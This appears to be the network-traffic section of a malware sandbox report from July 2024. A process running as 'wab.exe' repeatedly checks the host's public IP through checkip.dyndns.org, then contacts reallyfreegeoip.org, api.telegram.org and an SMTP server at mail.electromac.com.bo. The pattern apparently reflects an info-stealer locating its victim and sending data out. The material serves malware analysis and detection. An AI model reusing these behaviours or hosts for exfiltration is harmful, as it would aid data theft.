                                                Jul 25, 2024 10:19:41.106527090 CEST49728443192.168.2.5188.114.97.3
                                                Jul 25, 2024 10:19:41.106545925 CEST44349728188.114.97.3192.168.2.5
                                                Jul 25, 2024 10:19:41.127302885 CEST8049726193.122.6.168192.168.2.5
                                                Jul 25, 2024 10:19:41.127399921 CEST4972680192.168.2.5193.122.6.168
                                                Jul 25, 2024 10:19:41.159926891 CEST4972780192.168.2.5193.122.6.168
                                                Jul 25, 2024 10:19:41.694689989 CEST44349728188.114.97.3192.168.2.5
                                                Jul 25, 2024 10:19:41.697633028 CEST49728443192.168.2.5188.114.97.3
                                                Jul 25, 2024 10:19:41.697666883 CEST44349728188.114.97.3192.168.2.5
                                                Jul 25, 2024 10:19:41.833372116 CEST44349728188.114.97.3192.168.2.5
                                                Jul 25, 2024 10:19:41.833650112 CEST44349728188.114.97.3192.168.2.5
                                                Jul 25, 2024 10:19:41.833725929 CEST49728443192.168.2.5188.114.97.3
                                                Jul 25, 2024 10:19:41.834116936 CEST49728443192.168.2.5188.114.97.3
                                                Jul 25, 2024 10:19:41.836992025 CEST4972780192.168.2.5193.122.6.168
                                                Jul 25, 2024 10:19:41.837934017 CEST4972980192.168.2.5193.122.6.168
                                                Jul 25, 2024 10:19:41.845787048 CEST8049727193.122.6.168192.168.2.5
                                                Jul 25, 2024 10:19:41.845869064 CEST4972780192.168.2.5193.122.6.168
                                                Jul 25, 2024 10:19:41.846366882 CEST8049729193.122.6.168192.168.2.5
                                                Jul 25, 2024 10:19:41.846451044 CEST4972980192.168.2.5193.122.6.168
                                                Jul 25, 2024 10:19:41.846510887 CEST4972980192.168.2.5193.122.6.168
                                                Jul 25, 2024 10:19:41.852319002 CEST8049729193.122.6.168192.168.2.5
                                                Jul 25, 2024 10:19:44.510621071 CEST8049729193.122.6.168192.168.2.5
                                                Jul 25, 2024 10:19:44.538825035 CEST49730443192.168.2.5149.154.167.220
                                                Jul 25, 2024 10:19:44.538868904 CEST44349730149.154.167.220192.168.2.5
                                                Jul 25, 2024 10:19:44.538955927 CEST49730443192.168.2.5149.154.167.220
                                                Jul 25, 2024 10:19:44.539427996 CEST49730443192.168.2.5149.154.167.220
                                                Jul 25, 2024 10:19:44.539442062 CEST44349730149.154.167.220192.168.2.5
                                                Jul 25, 2024 10:19:44.566291094 CEST4972980192.168.2.5193.122.6.168
                                                Jul 25, 2024 10:19:45.471618891 CEST44349730149.154.167.220192.168.2.5
                                                Jul 25, 2024 10:19:45.471757889 CEST49730443192.168.2.5149.154.167.220
                                                Jul 25, 2024 10:19:45.473615885 CEST49730443192.168.2.5149.154.167.220
                                                Jul 25, 2024 10:19:45.473624945 CEST44349730149.154.167.220192.168.2.5
                                                Jul 25, 2024 10:19:45.473913908 CEST44349730149.154.167.220192.168.2.5
                                                Jul 25, 2024 10:19:45.475439072 CEST49730443192.168.2.5149.154.167.220
                                                Jul 25, 2024 10:19:45.520509005 CEST44349730149.154.167.220192.168.2.5
                                                Jul 25, 2024 10:19:45.781063080 CEST44349730149.154.167.220192.168.2.5
                                                Jul 25, 2024 10:19:45.781156063 CEST44349730149.154.167.220192.168.2.5
                                                Jul 25, 2024 10:19:45.781218052 CEST49730443192.168.2.5149.154.167.220
                                                Jul 25, 2024 10:19:45.781682014 CEST49730443192.168.2.5149.154.167.220
                                                Jul 25, 2024 10:19:51.367502928 CEST4971780192.168.2.5193.122.6.168
                                                Jul 25, 2024 10:19:51.567926884 CEST4972980192.168.2.5193.122.6.168
                                                Jul 25, 2024 10:19:51.592564106 CEST8049729193.122.6.168192.168.2.5
                                                Jul 25, 2024 10:19:51.592658997 CEST4972980192.168.2.5193.122.6.168
                                                Jul 25, 2024 10:19:52.143423080 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:52.151015043 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:52.151118040 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:52.726114035 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:52.726321936 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:52.735675097 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:52.842161894 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:52.842478037 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:52.870217085 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.166218996 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.166698933 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:53.179390907 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.298171043 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.298209906 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.298227072 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.298261881 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:53.298664093 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.298711061 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:53.320178032 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:53.336886883 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.434607983 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.438149929 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:53.443583012 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.553738117 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.554244995 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:53.559259892 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.682188034 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.682612896 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:53.690691948 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.908278942 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:53.908521891 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:53.914702892 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:54.024465084 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:54.024769068 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:54.030859947 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:54.226881027 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:54.227101088 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:54.234512091 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:54.342878103 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:54.343556881 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:54.343612909 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:54.343631029 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:54.343650103 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:54.349467039 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:54.350353003 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:54.460897923 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:54.503653049 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:55.983922958 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:55.988909960 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:56.097852945 CEST58749731192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:56.098318100 CEST49731587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:56.100069046 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:56.106550932 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:56.106761932 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:56.819963932 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:56.820117950 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:56.826703072 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:56.935118914 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:56.935375929 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:56.940526009 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:57.108762980 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:57.109368086 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:57.122659922 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:57.256366014 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:57.256652117 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:57.256690025 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:57.256721020 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:57.258661985 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:57.263679981 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:57.560520887 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:57.561428070 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:57.811803102 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:57.812490940 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:57.812771082 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:57.812926054 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:57.815254927 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:57.927472115 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:57.927742004 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:57.946624994 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.070538998 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.071000099 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:58.076240063 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.190834999 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.191382885 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:58.196234941 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.622756958 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.623615980 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:58.624206066 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.624511003 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:58.629157066 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.781145096 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.781455994 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:58.786509991 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.896621943 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.896974087 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:58.896974087 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:58.897020102 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:58.897020102 CEST49732587192.168.2.5192.185.142.133
                                                Jul 25, 2024 10:19:58.904686928 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.904719114 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.904747009 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.904773951 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:58.904802084 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:59.014813900 CEST58749732192.185.142.133192.168.2.5
                                                Jul 25, 2024 10:19:59.066422939 CEST49732587192.168.2.5192.185.142.133
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 25, 2024 10:19:18.441981077 CEST5501953192.168.2.51.1.1.1
                                                Jul 25, 2024 10:19:18.840034962 CEST53550191.1.1.1192.168.2.5
                                                Jul 25, 2024 10:19:20.525921106 CEST5813453192.168.2.51.1.1.1
                                                Jul 25, 2024 10:19:20.538589001 CEST53581341.1.1.1192.168.2.5
                                                Jul 25, 2024 10:19:22.953897953 CEST5250553192.168.2.51.1.1.1
                                                Jul 25, 2024 10:19:22.962157965 CEST53525051.1.1.1192.168.2.5
                                                Jul 25, 2024 10:19:44.525844097 CEST5464353192.168.2.51.1.1.1
                                                Jul 25, 2024 10:19:44.537656069 CEST53546431.1.1.1192.168.2.5
                                                Jul 25, 2024 10:19:51.569046974 CEST5963753192.168.2.51.1.1.1
                                                Jul 25, 2024 10:19:52.141906977 CEST53596371.1.1.1192.168.2.5
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jul 25, 2024 10:19:18.441981077 CEST192.168.2.51.1.1.10xb263Standard query (0)www.reap.skyestates.com.mtA (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:20.525921106 CEST192.168.2.51.1.1.10x3ff1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:22.953897953 CEST192.168.2.51.1.1.10xa086Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:44.525844097 CEST192.168.2.51.1.1.10x2212Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:51.569046974 CEST192.168.2.51.1.1.10x1b3bStandard query (0)mail.electromac.com.boA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jul 25, 2024 10:19:18.840034962 CEST1.1.1.1192.168.2.50xb263No error (0)www.reap.skyestates.com.mt108.167.181.251A (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:20.538589001 CEST1.1.1.1192.168.2.50x3ff1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Jul 25, 2024 10:19:20.538589001 CEST1.1.1.1192.168.2.50x3ff1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:20.538589001 CEST1.1.1.1192.168.2.50x3ff1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:20.538589001 CEST1.1.1.1192.168.2.50x3ff1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:20.538589001 CEST1.1.1.1192.168.2.50x3ff1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:20.538589001 CEST1.1.1.1192.168.2.50x3ff1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:22.962157965 CEST1.1.1.1192.168.2.50xa086No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:22.962157965 CEST1.1.1.1192.168.2.50xa086No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:44.537656069 CEST1.1.1.1192.168.2.50x2212No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                Jul 25, 2024 10:19:52.141906977 CEST1.1.1.1192.168.2.50x1b3bNo error (0)mail.electromac.com.boelectromac.com.boCNAME (Canonical name)IN (0x0001)false
                                                Jul 25, 2024 10:19:52.141906977 CEST1.1.1.1192.168.2.50x1b3bNo error (0)electromac.com.bo192.185.142.133A (IP address)IN (0x0001)false
                                                • www.reap.skyestates.com.mt
                                                • reallyfreegeoip.org
                                                • api.telegram.org
                                                • checkip.dyndns.org
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549714193.122.6.168806752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Jul 25, 2024 10:19:20.549671888 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Jul 25, 2024 10:19:21.213251114 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:21 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 85267f8e0f6697f514ae5c7fa61a881f
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Jul 25, 2024 10:19:21.216943026 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Jul 25, 2024 10:19:22.409809113 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 63fcfbf86dc9d1355076dac7b6cd165e
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Jul 25, 2024 10:19:23.579241037 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Jul 25, 2024 10:19:25.055377960 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:24 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 0d71280800c733d27d7a50b4de6f7759
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549717193.122.6.168806752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Jul 25, 2024 10:19:25.716675043 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Jul 25, 2024 10:19:28.107654095 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:28 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 359322c431076bcd6aece2a3f2ce2554
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.549719193.122.6.168806752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Jul 25, 2024 10:19:28.747915030 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Jul 25, 2024 10:19:32.096337080 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:31 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 717fd9605ba7462519596ad7de6a958d
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Jul 25, 2024 10:19:32.096575975 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:31 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 717fd9605ba7462519596ad7de6a958d
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.549721193.122.6.168806752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Jul 25, 2024 10:19:32.748121977 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Jul 25, 2024 10:19:35.551037073 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:35 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: b8e79f495e2a860b2e4c87e279f06d38
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.549724193.122.6.168806752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Jul 25, 2024 10:19:36.229909897 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Jul 25, 2024 10:19:36.883203030 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:36 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 7db82ca62ec9be512b02cf58d6efbf6d
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.549726193.122.6.168806752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Jul 25, 2024 10:19:37.677248955 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Jul 25, 2024 10:19:40.408366919 CEST730INHTTP/1.1 502 Bad Gateway
                                                Date: Thu, 25 Jul 2024 08:19:40 GMT
                                                Content-Type: text/html
                                                Content-Length: 547
                                                Connection: keep-alive
                                                X-Request-ID: 1cd1a7a5006324a810da5b9ad1a742c2
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
